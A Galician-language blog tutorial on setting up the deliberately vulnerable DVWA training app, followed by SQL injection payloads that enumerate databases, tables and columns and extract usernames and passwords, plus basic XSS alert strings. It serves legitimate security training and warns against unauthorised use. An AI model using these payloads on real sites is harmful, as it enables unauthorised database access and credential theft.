Máis vistos

Máis vistos

Comentado por : CeMIT Cuntis mércores, 17 de outubro de 2018


DVWA

é unha aplicación web PHP e MySQL para o entrenamento de explotación de vulnerabilidades web nun entorno controlado e de maneira legal

DVWA                    DVWA online      default loginadmin - password


cómo instalar           cómo configurar

Se queremos modificar o directorio de destino teremos que modificar dentro do arquivo httpd.conf ( c:\wamp\bin\apache\Apachexx\conf )

os parámetros:

DocumentRoot   e     Directory                              Cómo configurar sitios web en WampServer

Temos que ir ao directorio c:\wamp\www\DVWA\config e renomear o arquivo como config.inc.php e renomear a entrada db_password como ='';

e finalmente pulsar o botón "crear a base de datos"



Para poder executar DVWA correctamente debemos realizar as seguintes accións:

1.- Arrancar o servidor Apache: service apache2 start
2.- Arrancar o motor da base de datos: service mysql start
3.- Acceder á ruta da aplicación web vulnerable:   localhost/dvwa   ou  127.0.0.1/dvwa/

DVWA Security: low
 

(Só utilizar en DVWA para fins académicos e aprendizaxe.

NUNCA utilizar en ningunha páxina web sen autorización xa que poderá supoñer problemas legais)

Exemplos

SQL Injection:     ' or 1=1#                            1' UNION SELECT 1,2#
                                                   1' UNION SELECT 1,(select database());#
          1' UNION SELECT 1,group_concat(schema_name) FROM information_schema.schemata;#

se ao teclear www.paxinaproba.com/index.php?id=2' a web será vulnerable se mostra un erro similar a este:   You have an error in your SQL syntax;

se probamos a poñer un número calquera amósanos o ID, o nome e o apelido, polo tanto poderíamos saber cantos usuarios ten a base de datos.
(Neste caso sabemos que a base de datos ten 5 usuarios porque se poñemos 6 ou un número maior non devolve nada)

Sabemos que ten 2 columnas porque ao poñer a seguinte da erro:  1'  and 1=0 order by 3 #

Confirmámolo, inxectando algo nas 2 columnas:   1'  and 1=0 union select 1,2 #

Tamén podemos inxectar unha cadea de caracteres:
1'  and 1=0 union select 'Boas','Estamos de PROBAS' #

versión da base de datos:  1'  and 1=0 union select null,Version() #
         tamén funciona:    ' union select null, @@version #

nome da base de datos: 1'  and 1=0 union select null,database() #
                   ' union select null, database() #

Hostname: ' union select null, @@hostname #

Usuario: ' union all select current_user(), user() #
                             ' union all select system_user(), user() #

nomes das tablas(sabemos así que existe unha tabla "users")
1' and 1=0 union select null,table_name from information_schema.tables where table_schema!='msql' and table_schema!='information_schema'#


1' and 1=1 union select null, table_name from information_schema.tables #

nomes dos usuarios:
1' and 1=0 union select null,concat(table_name,0x0a,column_name) from information_schema.columns where table_name='users'#

' union select null, column_name from information_schema.columns where table_name = 'users' #

usuarios e contrasinais:   1'  and 1=0 union select null,concat(user,0x0a,password) from users #

1' and 1=1 union select user, password from users #


XSS Reflected: (para practicar XSS nunha aplicación web)
                         <script>alert('de proba')</script>

XSS Stored:      (formulario web)
 en Mensaxe teclear:  <script>alert('CeMIT, Cuntis')</script>

Leave a Reply

Subscribe to Posts | Subscribe to Comments

- Copyright © Ciberseguridade - Devil Survivor 2 - Powered by Blogger - Designed by Johanes Djogan -